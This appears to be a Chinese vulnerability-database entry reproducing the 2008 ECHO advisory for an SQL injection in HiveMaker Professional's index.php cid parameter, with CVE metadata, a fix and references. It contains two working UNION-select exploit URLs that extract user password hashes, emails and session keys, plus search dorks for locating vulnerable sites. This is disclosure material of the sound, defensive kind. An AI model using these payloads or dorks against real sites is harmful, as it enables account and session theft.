Hivemaker Professional 'index.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115308 漏洞类型 SQL注入
发布时间 2008-05-30 更新时间 2008-05-30
CVE编号 CVE-2008-6427 CNNVD-ID CNNVD-200903-136
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/5698
https://www.securityfocus.com/bid/29442
https://cxsecurity.com/issue/WLB-2009030150
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-136
|漏洞详情
Hivemaker是用PHP编写的个web网站构建系统。HivemakerProfessional1.0.2版本及其早期版本的index.php中存在SQL注入漏洞,当magic_quotes_gpc被中止时,远程攻击者可以借助cid参数,执行任意SQL指令。
|漏洞EXP
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

                                        .OR.ID
ECHO_ADV_96$2008

-----------------------------------------------------------------------------------------
[ECHO_ADV_96$2008] HiveMaker Professional <= 1.0.2 (cid) Sql Injection Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : May, 30 th 2008
Location       : Jakarta, Indonesia
Web            : http://e-rdc.org/v1/news.php?readmore=91
Critical Lvl   : Medium
Impact	       : System access
Where	       : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : HiveMaker Professional
version       : <= 1.0.2
Vendor        : http://www.hivemaker.com
Description   :

Hivemaker is a website creation system written in PHP. Users can create websites without knowing any HTML in a fashion similar to GeoCities. Users can select modules and VERY easily create contact forms, web counters and a variety of other content! Included is a website directory that allows all your users websites to be viewable to the general public.
For administrators Hivemaker is easily upgradeable. Modules and templates can be installed as simply as uploading the new template. The content is then immediately ready to be used by your users. Full user administration functions are available as well as the ability to add banners to every user's website.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "cid" parameter in index.php page is not properly verified before being used to sql query. 
This can be exploited thru the browser and get the hash md5 password from users and also retrieve users session id.
Successful exploitation requires that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~

http://www.target.com/[path]/sites/index.php?cid=-1%20union%20select%201,2,3,concat(uid,0x3a,username,0x3a,useremail,0x3a,userpass,0x3a,aid,0x3a,password_reminder,0x3a,confirmation_code),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20from%20userinfo--

http://www.target.com/[path]/sites/index.php?cid=-1%20union%20select%201,2,3,sesskey,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20from%20sessions--


Dork:
~~~~
Google    : "Hivemaker" or "Hivemaker(TM) Control Panel Login"
Altavista : "Hivemaker(TM) Control Panel Login"


Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
 

Timeline:
~~~~~~~~

- 24 - 05 - 2008 bug found
- 25 - 05 - 2008 vendor contacted
- 30 - 05 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife, zautha my little angel, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,kuntua,stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2008-05-30]
|受影响的产品
Scriptfactory New Media Hivemaker Professional 1.0.2
|参考资料

来源:XF
名称:hivemaker-index-sql-injection(42751)
链接:http://xforce.iss.net/xforce/xfdb/42751
来源:VUPEN
名称:ADV-2008-1923
链接:http://www.vupen.com/english/advisories/2008/1923/references
来源:BUGTRAQ
名称:20080601[ECHO_ADV_96$2008]HiveMakerProfessional<=1.0.2(cid)SqlInjectionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/492917/100/0/threaded
来源:MILW0RM
名称:5928
链接:http://www.milw0rm.com/exploits/5928
来源:MILW0RM
名称:5698
链接:http://www.milw0rm.com/exploits/5698
来源:SECUNIA
名称:30465
链接:http://secunia.com/advisories/30465
来源:OSVDB
名称:45916
链接:http://osvdb.org/45916
来源:MISC
链接:http://e-rdc.org/v1/news.php?readmore=91